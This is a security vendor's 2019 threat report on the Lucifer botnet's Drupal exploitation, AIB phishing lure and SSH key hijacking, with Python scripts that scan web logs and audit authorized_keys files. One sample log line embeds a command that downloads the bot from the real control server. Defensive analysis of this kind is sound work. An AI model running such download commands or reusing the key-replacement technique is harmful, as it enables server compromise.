Wednesday October 30th 2019
In this week’s threat report, we have a spooky threat actor just in time for Halloween. In September, the Perch Security Operations Center (SOC) discovered a campaign targeting unpatched Drupal servers and other vulnerable web-server workloads in the United States. After analyzing the malware used to build the botnet, the SOC is ready to report. The Lucifer botnet was also used to send phishing emails that took advantage of a change in EU financial services regulation.
Lucifer has announced his campaign for the 2020 malware race with a barrage of Drupal exploits, which we have been monitoring in the Perch SOC. During the September campaign, Perch SOC observed Lucifer spraying Drupalgeddon exploits from the IPs 193[.]56[.]28[.]142, 193[.]56[.]28[.]61, and 208[.]86[.]115[.]95. On success, the exploit would download the Lucifer Perl bot as ‘plaintext.txt’ from the control server at 193[.]56[.]28[.]142, and the bot would then connect to an IRC command and control server to receive further commands from the Lucifer operators.
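The indicators above are enough to sweep a web server's own logs. The following Python is an added example (not Perch's code, and it reproduces nothing from the Lucifer bot) that flags access-log lines whose client is one of the listed scanner IPs, or whose request references the control server or the ‘plaintext.txt’ payload, since an exploit request that makes the server fetch the bot has to carry that download URL somewhere in the request. The sample log lines are constructed: only the IPs and the file name are from the report, and the request paths, timestamps and user agents are illustrative.

```python
import re
from urllib.parse import unquote

# Indicators taken from this report (written defanged in the text, re-fanged here for matching).
LUCIFER_SCANNER_IPS = {"193.56.28.142", "193.56.28.61", "208.86.115.95"}
LUCIFER_C2_HOST = "193.56.28.142"
LUCIFER_PAYLOAD_NAME = "plaintext.txt"

# Apache/nginx "combined" access-log format: client, identd, user, [time], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) '
)


def classify(line):
    """Return the indicator names one access-log line matches (empty list if it is clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    if m["ip"] in LUCIFER_SCANNER_IPS:
        reasons.append("known_scanner_ip")
    # The download URL may be percent-encoded inside a query string or path,
    # so decode before looking for the C2 host or the payload file name.
    decoded = unquote(m["path"])
    if LUCIFER_C2_HOST in decoded or LUCIFER_PAYLOAD_NAME in decoded:
        reasons.append("payload_reference")
    return reasons


def scan_access_log(lines):
    """Return one hit record per matching line, in log order; clean lines are dropped."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"],
                         "status": int(m["status"]), "reasons": reasons})
    return hits


def defang(value):
    """Defang an IP or URL for sharing (193.56.28.142 -> 193[.]56[.]28[.]142, http -> hxxp)."""
    return value.replace("http", "hxxp").replace(".", "[.]")


# Constructed sample log: request shapes are illustrative, only the indicator values are real.
SAMPLE_LOG = """\
193.56.28.142 - - [12/Sep/2019:03:14:07 +0000] "POST /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Sep/2019:03:14:09 +0000] "GET /node/1 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Sep/2019:03:15:22 +0000] "GET /?cmd=wget%20http://193.56.28.142/plaintext.txt HTTP/1.1" 404 209 "-" "curl/7.58.0"
208.86.115.95 - - [12/Sep/2019:03:16:01 +0000] "GET /user/login HTTP/1.1" 200 3011 "-" "python-requests/2.22"
"""

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f'{hit["ts"]} {defang(hit["ip"])} {defang(hit["path"])} -> {", ".join(hit["reasons"])}')
```

Pipe a real access log into `scan_access_log` to run it against production data; the `payload_reference` match is the more useful of the two, since it catches exploit attempts from IPs other than the three listed here, and it fires regardless of whether the request succeeded, so a 404 on that line still tells you the host is being targeted.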
There are more than 1.2M sites running Drupal, and, based on reports from earlier in the year, many thousands of those sites remain vulnerable to recent exploits.
In addition to the large number of Drupal exploit attempts, Lucifer was also scanning for cPanel WebHost Manager (WHM), likely collecting targets for a recent Exim vulnerability. Lucifer’s main targets appear to be Linux and Unix web servers.
This isn’t Lucifer’s first campaign, but its techniques and capabilities have grown since the initial 2018 campaign. Previously, Lucifer scanned for a number of router and IoT vulnerabilities in order to install a Perl-based bot that connected to IRC command and control infrastructure. At that time Lucifer already had functions that let operators send mail, perform DDoS, install cryptocurrency miners, and kill competing miners already running on the compromised systems.
For the 2020 campaign, Lucifer is up to the same tricks, but has also added functions for port scanning, launching newly bundled exploits, and giving the operators SSH access to infected hosts. Additionally, comments in the source code show that new features are on the way: Lucifer is actively developing the Perl bot for future campaigns.
If you’d like to support the development of Lucifer, they have added a new Bitcoin address for donations. At the time of writing, Lucifer has not received any donations, but you can check the history of that Bitcoin address to see whether that has changed.
Although sending email is not a new feature for Lucifer, Perch researchers found evidence in a mail setup file that hints at Lucifer’s motives. When Lucifer commands bots to send email, the bots include an HTML message instructing users to set up Strong Customer Authentication (SCA) for their online bank account: “We inform you that your SCA is not setup. In order to use your Online Banking Services, you will have 24 hours to setup your SCA.” The email purported to be from Karen Davis of the Allied Irish Bank (AIB) Security Department.
AIB is one of the “Big Four” commercial banks in Ireland and offers a full range of personal and corporate banking services. To comply with the EU’s second Payment Services Directive (PSD2), AIB issued a notice on September 14th that customers would be required to set up SCA to keep access to their online banking accounts.
Lucifer took advantage of this change in EU banking regulation to kick off the phishing campaign, linking users to a compromised Australian site, http://eumundioriginals[.]com[.]au/css/aib/random.aspx, which hosted a page built to phish AIB customer login credentials. Presumably, Lucifer was trying to access AIB customer accounts and steal funds before users had set up SCA.
One of Lucifer’s new features, called ‘Auth Mode’, lets the threat actor establish SSH sessions on infected hosts: the bot fetches an authorized key from the control infrastructure and replaces the account’s existing authorized keys with keys generated by Lucifer. The operators can then log in to infected hosts over SSH using key-based authentication. Because the existing keys are replaced rather than appended to, legitimate key holders lose their access at the same time.
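The practical check against this technique is to audit authorized_keys against a baseline of approved key fingerprints, since an overwrite of the kind described here shows up as both unknown keys present and approved keys missing. The following Python is an added example, not Lucifer or Perch code. It parses the OpenSSH authorized_keys format (including leading options such as command="..." that contain quoted spaces), computes the same SHA256 fingerprints that `ssh-keygen -lf` prints, and reports the difference from the baseline. The keys are constructed from fixed bytes and are not real keys; the user names, comments and the rrsync path are assumptions.

```python
import base64
import hashlib
import struct

# Key types accepted as the start of the key fields in an authorized_keys entry.
KEY_TYPES = {
    "ssh-rsa", "ssh-dss", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
    "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
}


def fingerprint(blob_b64):
    """SHA256 fingerprint of a base64 key blob, in the form `ssh-keygen -lf` prints."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_line(line):
    """Parse one authorized_keys line; returns None for blanks and comments.

    Leading options such as command="..." may contain quoted spaces, so the split
    into options and key fields is made at the first whitespace outside double quotes.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    options = ""
    if line.split(None, 1)[0] not in KEY_TYPES:
        in_quote = False
        for i, ch in enumerate(line):
            if ch == '"':
                in_quote = not in_quote
            elif ch.isspace() and not in_quote:
                options, line = line[:i], line[i:].strip()
                break
        else:
            raise ValueError(f"malformed authorized_keys entry: {line!r}")
    fields = line.split(None, 2)
    if len(fields) < 2 or fields[0] not in KEY_TYPES:
        raise ValueError(f"malformed authorized_keys entry: {line!r}")
    key_type, blob = fields[0], fields[1]
    comment = fields[2] if len(fields) == 3 else ""
    return {"options": options, "type": key_type, "blob": blob,
            "comment": comment, "fingerprint": fingerprint(blob)}


def audit(text, baseline):
    """Compare a file's keys with the approved fingerprints.

    Returns the entries not in the baseline and the approved fingerprints that are
    absent; a wholesale replacement of the file shows up as both at once.
    """
    entries = [e for e in (parse_line(l) for l in text.splitlines()) if e]
    present = {e["fingerprint"] for e in entries}
    return {
        "unknown": [e for e in entries if e["fingerprint"] not in baseline],
        "missing": sorted(baseline - present),
    }


def _ssh_string(data):
    return struct.pack(">I", len(data)) + data


def ed25519_blob(raw_public_key):
    """Encode 32 bytes as an ssh-ed25519 public key blob (constructed sample keys only, not real ones)."""
    wire = _ssh_string(b"ssh-ed25519") + _ssh_string(raw_public_key)
    return base64.b64encode(wire).decode()


# Constructed sample data: two approved keys and one attacker key.
APPROVED_OPS = ed25519_blob(bytes(range(32)))
APPROVED_BACKUP = ed25519_blob(bytes(range(32, 64)))
ROGUE = ed25519_blob(b"\xaa" * 32)
BASELINE = {fingerprint(APPROVED_OPS), fingerprint(APPROVED_BACKUP)}

HEALTHY = f"""# keys approved for the deploy account
ssh-ed25519 {APPROVED_OPS} ops@bastion
command="/usr/bin/rrsync /srv/backup",no-pty ssh-ed25519 {APPROVED_BACKUP} backup@nas
"""

# What the same file looks like after an attacker replaced it with a key of their own.
OVERWRITTEN = f"ssh-ed25519 {ROGUE} attacker\n"

if __name__ == "__main__":
    for name, text in (("healthy", HEALTHY), ("overwritten", OVERWRITTEN)):
        result = audit(text, BASELINE)
        print(f"{name}: {len(result['unknown'])} unknown key(s), {len(result['missing'])} approved key(s) missing")
        for e in result["unknown"]:
            print(f"  unknown {e['type']} {e['fingerprint']} {e['comment']}")
```

Feed `audit` the contents of each account's authorized_keys file (and any AuthorizedKeysFile paths sshd is configured with) from a cron job or a configuration-management run, and treat a non-empty "missing" list as seriously as unknown keys: a legitimate key that has disappeared is the other half of the signal this technique leaves.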
Another feature new in this version of Lucifer is port scanning. It is used to build a target list for launching the bundled exploits and growing the botnet.
Many of the function and variable names in Lucifer’s code are Portuguese, so we expect the author is from Portugal or from a country where Portuguese is widely spoken, such as Angola, Brazil, Cape Verde, East Timor, Equatorial Guinea, Guinea-Bissau, Mozambique, or São Tomé and Príncipe. The fact that an Irish bank was targeted, and that Lucifer is familiar with regulatory changes for EU banks, reinforces the idea that the operator is based in Europe rather than in one of the other Portuguese-speaking countries.